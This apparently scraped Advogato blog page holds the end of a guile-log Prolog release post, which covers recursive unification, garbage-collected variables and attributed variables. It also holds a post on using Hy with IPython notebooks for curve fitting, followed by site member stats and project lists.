X = {0}[2, ref[0], {1}[2, ref[1], ref[1]]]

X = [1, {0}[1, ref[0], ref[0]], {1}[1, ref[1], ref[1]]]

X = [2, {0}[1, ref[0], ref[0]], {1}[1, ref[1], ref[1]]]

X = [1, {0}[1, ref[0], ref[0]], {1}[2, ref[1], ref[1]]]

X = [2, {0}[1, ref[0], ref[0]], {1}[2, ref[1], ref[1]]]

X = [1, {0}[1, ref[0], ref[0]], {1}[1, ref[1], {2}[1, ref[2], ref[2]]]]
$1 = stalled
prolog@(guile-user)>

Not the same solution can show up many times in this infinite list. It is possible to use tools that make sure the list is unique but that is expensive and is not shown here. Also note how one can issue an 's' and return to the guile prompt from where state management can be done as well as taking 10 values as shown above.

As shown above recursive aware unification as well as many other recursive aware operations can now be enabled via a prolog goal or the .rec switch at command line

A modified bdw-gc has been made (see the guile-log doc's) and code inside guile's C layer have enabled fully garbage collected prolog variables. Now most normal prolog code will be safe to use even in a server setup where you basically tail call forever and temporary bound variables will not blow the stack. This was a pretty difficult thing to get fully working. A really nice hack indeed.

swi prologs attributed variables and coroutines have been implemented at least partly and with some extra bells and whistles. This feature mean that you can hook in code that will be executed when functions are bounded to specific values or well just bounded, lookup these features in the swi-prolog manual if you are interested, pretty cool.

operator bindings are now name spaced, meaning that by importing a module operators can get a new meaning, this can be used to take advantage of guiles number tower and not adhere strictly to iso-prolog.

Ok there is a few more points in the release, download it and have a play. I'm basically the only user and implementor so it is only a cool alpha software. I'm now heading towards being able to compile at least parts of the swi prolog system, to get more testing and because it is a nice bite to chew on, getting good prolog compability regarding the module system and a few more points is the goal.


Happy hacking and have fun!

28 Nov 2014 oubiwann   » (Journeyer)

Scientific Computing with Hy and IPython

This blog post is a bit different than other technical posts I've done in the past in that the majority of the content is not on the blog in or gists; instead, it is in an IPython notebook. Having adored Mathematica back in the 90s, you can imagine how much I love the IPython Notebook app. I'll have more to say on that at a future date.

I've been doing a great deal of NumPy and matplotlib again lately, every day for hours a day. In conjunction with the new features in Python 3, this has been quite a lot of fun -- the most fun I've had with Python in years (thanks Guido, et al!). As you might have guessed, I'm also using it with Erlang (specifically, LFE), but that too is for a post yet to come.

With all this matplotlib and numpy work in standard Python, I've been going through Lisp withdrawals and needed to work with it from a fresh perspective. Needless to say, I had an enormous amount of fun doing this. Naturally, I decided to share with folks how one can do the latest and greatest with the tools of Python scientific computing, but in the syntax of the Python community's best kept secret: Clojure-Flavoured Python (Github, Twitter, Wikipedia).

Spoiler: observed data and
polynomial curve fitting
Looking about for ideas, I decided to see what Clojure's Incanter project had for tutorials, and immediately found what I was looking for: Linear regression with higher-order terms, a 2009 post by David Edgar Liebke.

Nearly every cell in the tutorial notebook is in Hy, and for that we owe a huge thanks to yardsale8 for his Hy IPython magics code. For those that love Python and Lisp equally, who are familiar with the ecosystems' tools, Hy offers a wonderful option for being highly productive with a language supporting Lisp- and Clojure-style macros. You can get your work done, have a great time doing it, and let that inner code artist out!

(In fact, I've started writing a macro for one of the examples in the tutorial, offering a more Lisp-like syntax for creating class methods. We'll see what Paul Tagliamonte has to say about it when it's done ... !)

If you want to check out the notebook code and run it locally, just do the following:

New Advogato Features

New HTML Parser: The long-awaited libxml2 based HTML parser code is live. It needs further work but already handles most markup better than the original parser.

Keep up with the latest Advogato features by reading the Advogato status blog.

If you're a C programmer with some spare time, take a look at the mod_virgule project page and help us with one of the tasks on the ToDo list!

Advogato User Stats
Users13999
Observer9884
Apprentice745
Journeyer2337
Master1029

New Advogato Members

Recently modified projects

18 Dec 2014 AshWednesday
2 Dec 2014 Justice4all
11 Nov 2014 respin
20 Jun 2014 Ultrastudio.org
13 Apr 2014 Babel
13 Apr 2014 Polipo
19 Mar 2014 usb4java
8 Mar 2014 Noosfero
17 Jan 2014 Haskell
17 Jan 2014 Erlang
17 Jan 2014 Hy
17 Jan 2014 clj-simulacrum
17 Jan 2014 Haskell-Lisp
17 Jan 2014 lfe-disco
17 Jan 2014 clj-openstack

New projects

2 Dec 2014 Justice4all
11 Nov 2014 respin
8 Mar 2014 Noosfero
17 Jan 2014 Haskell
17 Jan 2014 Erlang
17 Jan 2014 Hy
17 Jan 2014 clj-simulacrum
17 Jan 2014 Haskell-Lisp
17 Jan 2014 lfe-disco
17 Jan 2014 clj-openstack
17 Jan 2014 lfe-openstack
17 Jan 2014 LFE
1 Nov 2013 FAQ Linux
15 Apr 2013 Gramps
8 Apr 2013 pydiction